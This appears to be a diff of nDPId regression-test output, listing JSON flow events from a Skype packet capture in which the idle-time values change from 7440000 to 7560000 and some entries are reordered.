-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 